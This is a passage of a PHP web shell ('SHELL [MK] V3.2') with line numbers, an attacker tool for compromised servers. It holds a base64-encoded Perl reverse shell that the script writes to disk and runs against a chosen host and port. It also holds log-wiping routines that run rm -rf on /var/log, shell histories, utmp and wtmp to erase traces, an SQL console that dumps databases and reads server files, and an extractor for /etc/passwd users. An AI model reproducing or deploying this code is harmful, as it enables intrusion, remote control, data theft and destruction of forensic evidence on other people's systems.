'dXNlIElPOjpTb2NrZXQ7DQokc3lzdGVtICA9ICcvYmluL2Jhc2gnOw0KJEFSR0M9QEFSR1Y7DQpwcmludCAiQmFjay1Db25uZWN0IFBlcmxcblxuIjsNCmlmICgkQVJHQyE9Mikgew0KICAgcHJpbnQgIlVzYWdlOiAkMCBbSG9zdF0gW1BvcnRdIFxuXG4iOw0KICAgZGllICJFeDogJDAgMTI3LjAuMC4xIDIxMjEgXG4iOw0KfQ0KdXNlIFNvY2tldDsNCnVzZSBGaWxlSGFuZGxlOw0Kc29ja2V0KFNPQ0tFVCwgUEZfSU5FVCwgU09DS19TVFJFQU0sIGdldHByb3RvYnluYW1lKCd0Y3AnKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIFJlc29sdmUgSG9zdCA6KFxuIjsNCmNvbm5lY3QoU09DS0VULCBzb2NrYWRkcl9pbigkQVJHVlsxXSwgaW5ldF9hdG9uKCRBUkdWWzBdKSkpIG9yIGRpZSBwcmludCAiWy1dIFVuYWJsZSB0byBDb25uZWN0IEhvc3QgOihcbiI7DQpwcmludCAiWypdIFJlc29sdmluZyBIb3N0TmFtZVxuIjsNCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLiAkQVJHVlswXSBcbiI7DQpwcmludCAiWypdIFNwYXduaW5nIFNoZWxsIFxuIjsNCnByaW50ICJbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IFwhLyBcbiI7DQpTT0NLRVQtPmF1dG9mbHVzaCgpOw0Kb3BlbihTVERJTiwgIj4mU09DS0VUIik7DQpvcGVuKFNURE9VVCwiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCI+JlNPQ0tFVCIpOw0KcHJpbnQgIkJhY2stQ29ubmVjdCBQZXJsXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVDtlY2hvIC0tPT1TeXN0ZW1pbmZvPT0tLTsgdW5hbWUgLWE7ZWNobzsNCmVjaG8gLS09PVVzZXJpbmZvPT0tLTsgaWQ7ZWNobztlY2hvIC0tPT1EaXJlY3Rvcnk9PS0tOyBwd2Q7ZWNobzsgZWNobyAtLT09U2hlbGw9PS0tICIpOw0Kc3lzdGVtKCRzeXN0ZW0pOw==';
  304. $CHMOD = fopen("backconnected.pl" ,"w+");
  305. $WRITE = fWRITE ($CHMOD ,base64_decode($SCRIPTED));
  306. if($WRITE){
  307. ?>
  308. <br><span style='color:#FFFFFF;'>SCRIPT BACK-CONNECT PERL IS HERE > <? echo getcwd() ?>\backconnected.pl </span>
  309. <?
  310. fclose($CHMOD);
  311. chmod("backconnected.pl",0755);
  312. echo "<br> BACK-CONNECT PERL <a href='?Mister=Home'> COMMAND </a> > perl backconnected.pl <br>";
  313. echo "<br> GO TO <a href='?Mister=Home'> COMMAND </a> > USAGE : backconnected.pl [Host] [Port] <br><br>";
  314. }
  315. //////// MY RIGHT
  316. $FOTTER2 = "<footer class='MK-footer'>"; echo ''. $FOTTER2 .'|' ;
  317. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  318. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  319. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  320. $SERVERIP1 = "SERVER IP :"; echo ''. $SERVERIP1 .'' ;
  321. $SPAN2 = "<span style='color:#FFFFFF;'>";
  322. $SPAN3 = "</span>"; echo ''. $SPAN2 .'' ;
  323. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  324. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  325. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  326. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  327. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  328. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  329. $HOSTOWNED1 = "HOST OWNED :"; echo ''. $HOSTOWNED1 .'' ;
  330. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  331. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  332. echo ''. $REPORTERROR .'</a></span></footer>'; echo ''. $THEEND .'' ;
  333. exit;
  334. }
  335. /////// DELET LOGS
  336. if ($_GET['Mister'] == 'DELLOGS') {
  337. error_reporting(E_ERROR | E_PARSE);
  338. @ini_set("max_execution_time",0);
  339. @set_time_limit(0);
  340. echo "<br><nav class='Mister-nav'><center><span style='font-size:18px;color:#0078FF;'>LOGS ECRASED</span></nav><center><br><div class=content>";
  341. echo "<table style='margin: 0 auto;'>";
  342. exec("/logs/access.log");
  343. exec("/logs/error.log");
  344. exec("rm -rf /Apache2.2/logs/access.log");
  345. exec("rm -rf /Apache2.2/logs/error.log");
  346. exec("rm -rf /tmp/logs");
  347. exec("rm -rf /root/.ksh_history");
  348. exec("rm -rf /root/.bash_history");
  349. exec("rm -rf /root/.bash_logout");
  350. exec("rm -rf /usr/local/apache/logs");
  351. exec("rm -rf /usr/local/apache/log");
  352. exec("rm -rf /var/apache/logs");
  353. exec("rm -rf /var/apache/log");
  354. exec("rm -rf /var/run/utmp");
  355. exec("rm -rf /var/logs");
  356. exec("rm -rf /var/log");
  357. exec("rm -rf /var/adm");
  358. exec("rm -rf /etc/wtmp");
  359. exec("rm -rf /etc/utmp");
  360. exec("rm -rf $HISTFILE");
  361. exec("rm -rf /var/log/lastlog");
  362. exec("rm -rf /var/log/wtmp");
  363. //SHELL_EXEC
  364. shell_exec("/logs/access.log");
  365. shell_exec("/logs/error.log");
  366. shell_exec("rm -rf /Apache2.2/logs/access.log");
  367. shell_exec("rm -rf /Apache2.2/logs/error.log");
  368. shell_exec("rm -rf /tmp/logs");
  369. shell_exec("rm -rf /root/.ksh_history");
  370. shell_exec("rm -rf /root/.bash_history");
  371. shell_exec("rm -rf /root/.bash_logout");
  372. shell_exec("rm -rf /usr/local/apache/logs");
  373. shell_exec("rm -rf /usr/local/apache/log");
  374. shell_exec("rm -rf /var/apache/logs");
  375. shell_exec("rm -rf /var/apache/log");
  376. shell_exec("rm -rf /var/run/utmp");
  377. shell_exec("rm -rf /var/logs");
  378. shell_exec("rm -rf /var/log");
  379. shell_exec("rm -rf /var/adm");
  380. shell_exec("rm -rf /etc/wtmp");
  381. shell_exec("rm -rf /etc/utmp");
  382. shell_exec("rm -rf $HISTFILE");
  383. shell_exec("rm -rf /var/log/lastlog");
  384. shell_exec("rm -rf /var/log/wtmp");
  385. //PASSTHRU
  386. passthru("/logs/access.log");
  387. passthru("/logs/error.log");
  388. passthru("rm -rf /Apache2.2/logs/access.log");
  389. passthru("rm -rf /Apache2.2/logs/error.log");
  390. passthru("rm -rf /tmp/logs");
  391. passthru("rm -rf /root/.ksh_history");
  392. passthru("rm -rf /root/.bash_history");
  393. passthru("rm -rf /root/.bash_logout");
  394. passthru("rm -rf /usr/local/apache/logs");
  395. passthru("rm -rf /usr/local/apache/log");
  396. passthru("rm -rf /var/apache/logs");
  397. passthru("rm -rf /var/apache/log");
  398. passthru("rm -rf /var/run/utmp");
  399. passthru("rm -rf /var/logs");
  400. passthru("rm -rf /var/log");
  401. passthru("rm -rf /var/adm");
  402. passthru("rm -rf /etc/wtmp");
  403. passthru("rm -rf /etc/utmp");
  404. passthru("rm -rf $HISTFILE");
  405. passthru("rm -rf /var/log/lastlog");
  406. passthru("rm -rf /var/log/wtmp");
  407. echo "<table align='center' width='50%'>";
  408. //LET THE MOTHER OF FUNCTIONS TO COMPLETE THE TASK
  409. sleep(1);
  410. echo '</span><br><span style="color:#FFFFFF"><center>GOOD LOCK ! YOUR TRACES HAS BEEN ECRASED FROM THE SERVER </span></center>';
  411. echo '<center><br><a href="?Mister=DELLOGS" style="border-top: 3px solid #0078FF; font-size:9px;font-family: "Freight Sans Bold", Tahoma, sans-serif;text-align: center;color: #FFFFFF; font-size:9px;border: 0;background: -webkit-linear-gradient(top, #4382EF 0, #1463EB 33%, #0C3B8D 100%) no-repeat;border-radius:5px;padding:0 10px;margin:0 auto;height:25px;border-bottom:5px solid #FFFFFF;border-bottom:4px solid #0078FF;"> CLEANNER LOGS </a></center>';
  412. //////// MY RIGHT
  413. $FOTTER2 = "<footer class='MK-footer'>"; echo ''. $FOTTER2 .'|' ;
  414. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  415. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  416. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  417. $SERVERIP1 = "SERVER IP :"; echo ''. $SERVERIP1 .'' ;
  418. $SPAN2 = "<span style='color:#FFFFFF;'>";
  419. $SPAN3 = "</span>"; echo ''. $SPAN2 .'' ;
  420. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  421. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  422. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  423. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  424. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  425. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  426. $HOSTOWNED1 = "HOST OWNED :"; echo ''. $HOSTOWNED1 .'' ;
  427. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  428. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  429. echo ''. $REPORTERROR .'</a></span></footer>'; echo ''. $THEEND .'' ;
  430. exit ; }
  431. ///// DETECT LOGS
  432.  
  433. if ($_GET['Mister'] == 'SQLConnect') {
  434. echo "<br><nav class='Mister-nav'><center><span style='font-size:18px;color:#0078FF;'>SQLConnect</span></nav><center>";
  435. echo "<br>";
  436. echo "<script>     var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';     var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';     var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';     var d = document;    function set(a,c,p1,p2,p3,charset) {        if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;         if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;         if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;        if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;        if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;        if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;   }   function g(a,c,p1,p2,p3,charset) {      set(a,c,p1,p2,p3,charset);      d.mf.submit();  }  </script>";  
  437. class DbClass {        
  438. var $type;     
  439. var $link;     
  440. var $res;function DbClass($type)    {          
  441. $this->type = $type;        }      
  442. function connect($host, $user, $pass, $dbname){            
  443. switch($this->type) {              
  444. case 'mysql':                  
  445. if( $this->link = @mysql_connect($host,$user,$pass,true) )
  446. return true;                   
  447. break;             
  448. case 'pgsql':                  
  449. $host = explode(':', $host);                   
  450. if(!$host[1]) $host[1]=5432;                   
  451. if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") )
  452. return true;                   
  453. break;}            
  454. return false;}     
  455. function selectdb($db) {           
  456. switch($this->type) {              
  457. case 'mysql':                  
  458. if (@mysql_select_db($db))
  459. return true;                   
  460. break;          }          
  461. return false;       }      
  462. function query($str) {         
  463. switch($this->type) {              
  464. case 'mysql':                  
  465. return $this->res = @mysql_query($str);                    
  466. break;             
  467. case 'pgsql':                  
  468. return $this->res = @pg_query($this->link,$str);                   
  469. break; }           
  470. return false;}     
  471. function fetch() { $res = func_num_args()?func_get_arg(0):$this->res;          
  472. switch($this->type) {              
  473. case 'mysql':                  
  474. return @mysql_fetch_assoc($res);                   
  475. break;             
  476. case 'pgsql':                  
  477. return @pg_fetch_assoc($res);                  
  478. break;          }          
  479. return false;       }      
  480. function listDbs() {           
  481. switch($this->type) {              
  482. case 'mysql':                        
  483. return $this->query("SHOW databases");             
  484. break;             
  485. case 'pgsql':                  
  486. return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");              
  487. break;  }          
  488. return false;       }      
  489. function listTables() {            
  490. switch($this->type) {              
  491. case 'mysql':                  
  492. return $this->res = $this->query('SHOW TABLES');               
  493. break;             
  494. case 'pgsql':                  
  495. return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");              
  496. break;          }          
  497. return false;       }      
  498. function error() {         
  499. switch($this->type) {              
  500. case 'mysql':                  
  501. return @mysql_error();             
  502. break;             
  503. case 'pgsql':                  
  504. return @pg_last_error();               
  505. break;          }          
  506. return false;       }      
  507. function setCharset($str) {            
  508. switch($this->type) {              
  509. case 'mysql':                  
  510. if(function_exists('mysql_set_charset'))                       
  511. return @mysql_set_charset($str, $this->link);                  
  512. else $this->query('SET CHARSET '.$str);                    
  513. break;             
  514. case 'pgsql':                  
  515. return @pg_set_client_encoding($this->link, $str);                 
  516. break;          }          
  517. return false;       }      
  518. function loadFile($str) {          
  519. switch($this->type) {              
  520. case 'mysql':                  
  521. return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));             
  522. break;             
  523. case 'pgsql':                  
  524. $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");                 
  525. $r=array();                    
  526. while($i=$this->fetch())                       
  527. $r[] = $i['file'];                 
  528. $this->query('drop table wso2');                   
  529. return array('file'=>implode("\n",$r));                
  530. break;          }          
  531. return false;       }      
  532. function dump($table, $fp = false) {           
  533. switch($this->type) {              
  534. case 'mysql':                  
  535. $res = $this->query('SHOW CREATE TABLE `'.$table.'`');                 
  536. $create = mysql_fetch_array($res);                 
  537. $sql = $create[1].";\n";                    
  538. if($fp) fwrite($fp, $sql); else
  539. echo($sql);                    
  540. $this->query('SELECT * FROM `'.$table.'`');                    
  541. $head = true;                  
  542. while($item = $this->fetch()) {                        
  543. $columns = array();                        
  544. foreach($item as $k=>$v) {                            
  545. if($v == null)                                
  546. $item[$k] = "NULL";                            
  547. elseif(is_numeric($v))                                
  548. $item[$k] = $v; else                                
  549. $item[$k] = "'".@mysql_real_escape_string($v)."'";                         
  550. $columns[] = "`".$k."`";                        }                        
  551. if($head) {                            
  552. $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';                            
  553. $head = false;                         }
  554. else                            
  555. $sql = "\n\t,(".implode(", ", $item).')';                        
  556. if($fp) fwrite($fp, $sql); else echo($sql);                     }                    
  557. if(!$head)                        
  558. if($fp) fwrite($fp, ";\n\n");
  559. else
  560. echo(";\n\n");             
  561. break;             
  562. case 'pgsql':                  
  563. $this->query('SELECT * FROM '.$table);                 
  564. while($item = $this->fetch()) {                        
  565. $columns = array();                        
  566. foreach($item as $k=>$v) {                         
  567. $item[$k] = "'".addslashes($v)."'";                             $columns[] = $k;                        }                        
  568. $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";                        
  569. if($fp) fwrite($fp, $sql); else echo($sql);                     }              
  570. break;          }          
  571. return false;       }   };  
  572. $db = new DbClass($_POST['type']);  
  573. if(@$_POST['p2']=='download') {        
  574. $db->connect($_POST['sql_host'],
  575. $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);      
  576. $db->selectdb($_POST['sql_base']);        
  577. switch($_POST['charset']) {            
  578. case "Windows-1251": $db->setCharset('cp1251');
  579. break;            
  580. case "UTF-8": $db->setCharset('utf8');
  581. break;            
  582. case "KOI8-R": $db->setCharset('koi8r');
  583. break;            
  584. case "KOI8-U": $db->setCharset('koi8u');
  585. break;            
  586. case "cp866": $db->setCharset('cp866');
  587. break;         }        
  588. if(empty($_POST['file'])) {             ob_start("ob_gzhandler", 4096);             header("Content-Disposition: attachment; filename=dump.sql");             header("Content-Type: text/plain");            
  589. foreach($_POST['tbl'] as $v)               
  590. $db->dump($v);            
  591. exit; } elseif($fp = @fopen($_POST['file'], 'w')) {            
  592. foreach($_POST['tbl'] as $v)                
  593. $db->dump($v, $fp);            
  594. fclose($fp);            
  595. unset($_POST['p2']); } else            
  596. die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');   }  
  597. echo " <div class=content> <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr> <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr> <input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'> <td><select name='type'><option value='mysql' ";    
  598. if(@$_POST['type']=='mysql')
  599. echo 'selected';
  600. echo ">MySql</option><option value='pgsql' ";
  601. if(@$_POST['type']=='pgsql')
  602. echo 'selected';
  603. echo ">PostgreSql</option></select></td> <td><input type=text name=sql_host value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td> <td><input type=text name=sql_login value='". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td> <td><input type=text name=sql_pass value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";     $tmp = "<input type=text name=sql_base value=''>";  
  604. if(isset($_POST['sql_host'])){     
  605. if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {            
  606. switch($_POST['charset']) {                
  607. case "Windows-1251": $db->setCharset('cp1251');
  608. break;             
  609. case "UTF-8": $db->setCharset('utf8');
  610. break;             
  611. case "KOI8-R": $db->setCharset('koi8r');
  612. break;             
  613. case "KOI8-U": $db->setCharset('koi8u');
  614. break;             
  615. case "cp866": $db->setCharset('cp866');
  616. break;          }           $db->listDbs();            
  617. echo "<select name=sql_base><option value=''></option>";           
  618. while($item = $db->fetch()) {              
  619. list($key, $value) = each($item);              
  620. echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';           }          
  621. echo '</select>';       }      
  622. else
  623. echo $tmp;  }
  624. else       
  625. echo $tmp;  
  626. echo "</td><td><input type=submit class=Mister-button value='Done' onclick='fs(d.sf);'></td>                 <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' CHECKED') . "> count the number of rows</td>            </tr></table><script>             s_db='".@addslashes($_POST['sql_base'])."';             function fs(f) {                 if(f.sql_base.value!=s_db) { f.onsubmit = function() {};                     if(f.p1) f.p1.value='';                     if(f.p2) f.p2.value='';                     if(f.p3) f.p3.value='';                 }             }             function st(t,l) {              d.sf.p1.value = 'select';               d.sf.p2.value = t;                 if(l && d.sf.p3) d.sf.p3.value = l;              d.sf.submit();          }           function is() {                 for(i=0;i<d.sf.elements['tbl[]'].length;++i)                    d.sf.elements['tbl[]'][i].CHECKED = !d.sf.elements['tbl[]'][i].CHECKED;             }       </script>";    
  627. if(isset($db) && $db->link){       
  628. echo "<br/><table width=100% cellpadding=2 cellspacing=0>";            
  629. if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']);             
  630. echo "<tr><td width=1 style='border-top:1px solid #666;'><span>Tables:</span><br><br>";                
  631. $tbls_res = $db->listTables();             
  632. while($item = $db->fetch($tbls_res)) {                 
  633. list($key, $value) = each($item);                    
  634. if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value);                    
  635. echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>";                }              
  636. echo "<input type='checkbox' onclick='is();'> <input type=button class=Mister-button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:1px solid #666;'>";               
  637. if(@$_POST['p1'] == 'select') {                    
  638. $_POST['p1'] = 'query';                    
  639. $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
  640. $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);                   
  641. $num = $db->fetch();$pages = ceil($num['n'] / 30);
  642. echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";                    
  643. echo " of $pages";                    
  644. if($_POST['p3'] > 1)                        
  645. echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>&lt; Prev</a>";                    
  646. if($_POST['p3'] < $pages)                        
  647. echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next &gt;</a>";                    
  648. $_POST['p3']--;
  649. if($_POST['type']=='pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);                    
  650. else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';                 
  651. echo "<br><br>";                }              
  652. if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {                   
  653. $db->query(@$_POST['p2']);                 
  654. if($db->res !== false) {                       
  655. $title = false;                        
  656. echo '<table width=100% cellspacing=1 cellpadding=0 class=main >';                     
  657. $line = 1;                     
  658. while($item = $db->fetch()) {                          
  659. if(!$title) {                              
  660. echo '<tr>';                               
  661. foreach($item as $key => $value)                                   
  662. echo '<th>'.$key.'</th>';                               reset($item);                              
  663. $title=true;                               
  664. echo '</tr><tr>';                              
  665. $line = 2;                          }                          
  666. echo '<tr class="l'.$line.'">';                            
  667. $line = $line==1?2:1;                          
  668. foreach($item as $key => $value) {                             
  669. if($value == null)                                 
  670. echo '<td><i>null</i></td>';                               
  671. else                                   
  672. echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';                            }                          
  673. echo '</tr>'; }                        
  674. echo '</table>'; }
  675. else {                     
  676. echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';                     }               }              
  677. echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";                
  678. if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))                    
  679. echo htmlspecialchars($_POST['p2']);                
  680. echo "</textarea><br/><input type=submit class=Mister-button value='EXECUTE'>";                
  681. echo "</td></tr>";          }          
  682. echo "</table></form><br/>";            
  683. if($_POST['type']=='mysql') {                
  684. $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");                
  685. if($db->fetch())                    
  686. echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit class =Mister-button value='Done'></form>";   }         
  687. if(@$_POST['p1'] == 'loadfile') {              
  688. $file = $db->loadFile($_POST['p2']);               
  689. echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';            }   }
  690.  else {        
  691. echo htmlspecialchars($db->error());     }  
  692. echo '<br><br>';
  693. ///// FOOTER
  694. $FOTTER2 = "<footer class='MK-footer'>";  
  695. echo ''. $FOTTER2 .'' ;
  696. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  697. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  698. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  699. $SERVERIP1 = "SERVER IP :";
  700. echo ''. $SERVERIP1 .'' ;
  701. $SPAN2 = "<span style='color:#FFFFFF;'>";
  702. $SPAN3 = "</span>";
  703. echo ''. $SPAN2 .'' ;
  704. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  705. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  706. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  707. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  708. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  709. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  710. $HOSTOWNED1 = "HOST OWNED :";
  711. echo ''. $HOSTOWNED1 .'' ;
  712. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  713. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  714. echo ''. $REPORTERROR .'</a></span></footer>';
  715. echo ''. $THEEND .'' ;
  716. exit;
  717. }
  718. ///////// EXTRACT
  719. if ($_GET["Mister"] == "EtcExtract"){
  720. ///// FOOTER
  721. $FOTTER2 = "<footer class='MK-footer'>";  
  722. echo ''. $FOTTER2 .'' ;
  723. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  724. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  725. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  726. $SERVERIP1 = "SERVER IP :";
  727. echo ''. $SERVERIP1 .'' ;
  728. $SPAN2 = "<span style='color:#FFFFFF;'>";
  729. $SPAN3 = "</span>";
  730. echo ''. $SPAN2 .'' ;
  731. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  732. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  733. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  734. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  735. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  736. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  737. $HOSTOWNED1 = "HOST OWNED :";
  738. echo ''. $HOSTOWNED1 .'' ;
  739. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  740.  
  741. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  742. echo ''. $REPORTERROR .'</a></span></footer>';
  743. echo ''. $THEEND .'' ;
  744. echo "<br><center><nav class='social'><ul>
  745. <li><a href='?Mister=read'>Read /Etc/Passwd</a></li>
  746. <li><a href='?Mister=EtcExtract'> ExtracT Users From /etc/passwd</a></li>
  747. <li><a href='?Mister=Cms'>Cms Scanner</a></li>
  748. </ul></nav></center>";
  749. echo "<nav class='Mister-nav'><center><span style='font-size:18px;color:#0078FF'>EXTRACT USERS FROM /ETC/PASSWD </span></nav><br><div class=content><center>";
  750.  echo '<form action="" method="POST"><textarea rows="20" cols="20" name="fpasswd" style="width:50%;"></textarea></br>
  751. <br><input type="submit" value="Go..!" class="Mister-button"></br></br>';
  752. if(isset($_POST['fpasswd'])){
  753.   foreach(explode("\n",$_POST['fpasswd']) as $user){
  754.   $user = trim($user);
  755.   $user = explode(":", $user);
  756.   echo $user[0]."</br></form>";
  757. }
  758. }
  759. exit;
  760. }
  761. /////// ABOUT
  762. if ($_GET['Mister'] == 'Abouts') {
  763. echo "<br><nav class='Mister-nav'><center><span style='font-size:18px;  color:#0078FF'>ABOUT</span><center></nav>";
  764. echo "<br><div class=content><center><img src='http://gulf-up.com/do.php?img=9366' height='150'></center><br>";
  765. echo "<center><span style='font-size:20px;color:white'>SHELL [MK] V3.2</a></span></center>
  766. <br>
  767. <center><marquee direction='up' scrollamount='1' bgcolor='' width='400' height='50'><center>
  768. <center><span style='color:white'>CREATED BY MISTER KLIO</span><center>
